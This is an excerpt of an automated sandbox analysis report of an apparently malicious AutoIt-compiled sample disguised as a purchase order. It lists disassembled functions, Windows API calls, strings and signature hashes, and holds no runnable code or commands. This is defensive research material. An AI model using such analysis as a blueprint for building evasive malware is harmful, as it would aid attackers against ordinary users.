SetBkMode.GDI32(?,00000001), ref: 0041B4B5
GetStockObject.GDI32(00000005), ref: 0041B4BD
GetWindowDC.USER32(?,00000000), ref: 0047DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0047DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0047DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0047DE6A
GetPixel.GDI32(00000000,?,?), ref: 0047DE8A
ReleaseDC.USER32(?,00000000), ref: 0047DE95

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
Instruction ID: ebc7ae97a81ee43cd2b7e44fa5307cd1c78914befb32965c7e0958ce0b8f082e
Opcode Fuzzy Hash: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
Instruction Fuzzy Hash: 50E06D31900240AADF216F74EC0DBDD3B22AF51335F04CA2BF669580E2C3754980CB15

Function 0043B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0043B2DF
UnloadUserProfile.USERENV(?,?), ref: 0043B2EB
CloseHandle.KERNEL32(?), ref: 0043B2F4
CloseHandle.KERNEL32(?), ref: 0043B2FC

Part of subcall function 0043AB24: GetProcessHeap.KERNEL32(00000000,?,0043A848), ref: 0043AB2B
Part of subcall function 0043AB24: HeapFree.KERNEL32(00000000), ref: 0043AB32

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
Instruction ID: a739e54aae2a3a9cd22030b7aca237d8105e1b6acd56b05ad55d5797ed03ab16
Opcode Fuzzy Hash: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
Instruction Fuzzy Hash: E7E0BF36505005BBDB013B95DC0885DFB66FF983213108635F615815B1CB32A871EB55

Function 0047B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0047B29A
GetDC.USER32(00000000), ref: 0047B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0047B2C3
ReleaseDC.USER32 ref: 0047B2E2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ec67915f06b264683b49137b804281f4acd025879a02d45731f49f2f4a66ca92
Instruction ID: ac55191bf5dc09552fbdaeed682a17cbe62f7bb7b12c61747605478ce30e63c9
Opcode Fuzzy Hash: ec67915f06b264683b49137b804281f4acd025879a02d45731f49f2f4a66ca92
Instruction Fuzzy Hash: F0E01AB1901208EFDB016F708848A6D7BA5EB4C354F11C82AF95A97291EA7898418B49

Function 0047B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0047B2AE
GetDC.USER32(00000000), ref: 0047B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0047B2C3
ReleaseDC.USER32 ref: 0047B2E2

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 40d13639704ad495b622b523cbcbeb9e56c1aabbfad60d149bac482c6001f4f6
Instruction ID: 1d14186068ba132644a7ce174cc16f4ac5b7c4f797403fb1499130b6af5a5e45
Opcode Fuzzy Hash: 40d13639704ad495b622b523cbcbeb9e56c1aabbfad60d149bac482c6001f4f6
Instruction Fuzzy Hash: DDE04FB1900204EFDB006F70C84866D7BA5FB4C354F11882EF95AD7290EB7898418B48

Function 00AEFAF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

pow, xrefs: 00AEFBF5, 00AEFC12

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: bf940d06f8f9fc6b1ae281b5996f9320640e1f50f97d758281a0619ba68a33ed
Instruction ID: f85d35959db5812c1dcbfc92c00ad6970f6c3ff0118a47d81fc8bae499f7de7f
Opcode Fuzzy Hash: bf940d06f8f9fc6b1ae281b5996f9320640e1f50f97d758281a0619ba68a33ed
Instruction Fuzzy Hash: 42519C71A08289CECB117B59CE4137A7BA0EB90750F308D3CF6D5862A9EF358CD59A46

Function 0044290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00442A72

Strings

I/G, xrefs: 004429FC, 00442A64, 00442A12
I/G, xrefs: 0044297F

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscpy
String ID: I/G$I/G
API String ID: 3048848545-4201233942
Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction ID: 5b5fadca2aca936165ba25b9bf37a07b386b53b8396f083847d400d46c1348b3
Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction Fuzzy Hash: 9D41F771A00216AAEF24DF85D5419FEB770EF48314F90405BF881B7291DBB89E82C7AC

Function 0044C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 004044ED: __fread_nolock.LIBCMT ref: 0040450B

_wcscmp.LIBCMT ref: 0044C65D
_wcscmp.LIBCMT ref: 0044C670

Strings

FILE, xrefs: 0044C5A5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
Instruction ID: d6fd1d98c24f378f3689914d9611b9600f4530d8b2fd317d4f5c4972b7240fa3
Opcode Fuzzy Hash: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
Instruction Fuzzy Hash: 3241F972A0021ABBDF109AA5DC81FEF77B9DF89704F00407AF605FB181D6789A04C769

Function 0046A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0046A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0046A86F

Strings

', xrefs: 0046A7C3

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
Instruction ID: 05b9b359a9089e5631400059deb0dd6c5e581389fb3afd8405a1aacd88250687
Opcode Fuzzy Hash: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
Instruction Fuzzy Hash: 17410A74E017099FDB54DF64C880BDABBB5FF09304F10016AE905AB351E774A952CF96

Function 0046975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0046980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0046984A

Strings

static, xrefs: 004697AA

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ef457bd2461c8dff2cf81eda30860f1367b64f41b894c03d079e3cd50b041c1a
Instruction ID: d9788c9899c7522218275ab4addd7f73f4a76ae600fffe49f6da806261780b35
Opcode Fuzzy Hash: ef457bd2461c8dff2cf81eda30860f1367b64f41b894c03d079e3cd50b041c1a
Instruction Fuzzy Hash: 4B318F71510604AADB109F35CC80BFB73ADFF59764F10861EF9A9C7190EA74AC81C769

Function 00445157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004451C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00445201

Strings

0, xrefs: 004451BF

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8b80eb4c242ff8015c841baeeec5b5229a0f17c1c55c3c25716007ff3982c034
Instruction ID: 5b10929a3873ab4178e6ce3d4b5ff2fbe3bc7aec09b2f3309b6731db4349dc23
Opcode Fuzzy Hash: 8b80eb4c242ff8015c841baeeec5b5229a0f17c1c55c3c25716007ff3982c034
Instruction Fuzzy Hash: 9631E531A00208ABFF24CF99D845B9FBBF4BF45350F14405FE981A62A2D7B89944CF19

Function 0045658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00456608

Strings

AUTOITCALLVARIABLE%d, xrefs: 004565FA
, $, xrefs: 00456648

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 8e014c34945cad930d2a336b774e75bf7b9cd83839c64762cf43a85639d646fb
Instruction ID: fee805f44d74d647617933fdb8fb0fcedd988ae0d96ca396d508efdd7dfb75b5
Opcode Fuzzy Hash: 8e014c34945cad930d2a336b774e75bf7b9cd83839c64762cf43a85639d646fb
Instruction Fuzzy Hash: 11218671A00114ABCF14EF55C881FEE77B4AF45305F51046FF805AB182DB78E949CBA9

Function 004693CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00469467

Strings

Combobox, xrefs: 00469429

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
Instruction ID: 0958ac638f35600e6680e70f277b7a25b188f367ae3316ed6a952ac5d0afe81a
Opcode Fuzzy Hash: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
Instruction Fuzzy Hash: AC11B6713042087FEF119F54DC80EBB376EEB483A4F10012AF91497390E6799C528769

Function 004698FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

GetWindowRect.USER32(00000000,?), ref: 00469968
GetSysColor.USER32(00000012), ref: 00469982

Strings

static, xrefs: 00469945

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
Instruction ID: 298e3bd79bdac7eea84c9a0c33d59882faeeb666d7678b2b6b60e360f338a6ae
Opcode Fuzzy Hash: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
Instruction Fuzzy Hash: F51159B2510209AFDB04DFB8CC45AFA7BA8FB08304F040A2DF955E2250E778E851DB64

Function 00469617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00469699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004696A8

Strings

edit, xrefs: 0046967D

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
Instruction ID: 079201cb152505e4b2648a84ffa414ebecf0272cf0d9648ea889d6aacb27be9d
Opcode Fuzzy Hash: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
Instruction Fuzzy Hash: 7F118CB1500208ABEF105F64DC40EEB3B6EEB05378F50472AF965932E0E7B9DC51976A

Function 00445262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004452D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004452F4

Strings

0, xrefs: 004452CE

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
Instruction ID: 4aa882214851b6137429ad84dca8c1b776e6d3ce1b64bb11d89768716e185c9b
Opcode Fuzzy Hash: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
Instruction Fuzzy Hash: 7F11E675901614ABEF10DF98DD04F9E77B8AB06B50F040067ED01E72A6D3B4ED04CBA9

Function 00454D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00454DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00454E1E

Strings

<local>, xrefs: 00454DE6

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
Instruction ID: a2b902033b2b272dcdd8de091da7bffdf87fca83f2330df1588581490dfa76f8
Opcode Fuzzy Hash: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
Instruction Fuzzy Hash: E511CE70501221BADB248F51CC89EFBFBA8FB4635AF10822BF9054A241D3785989D6F4

Function 0042A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004337A7
___raise_securityfailure.LIBCMT ref: 0043388E

Strings

(L, xrefs: 00433889

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (L
API String ID: 3761405300-64732604
Opcode ID: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
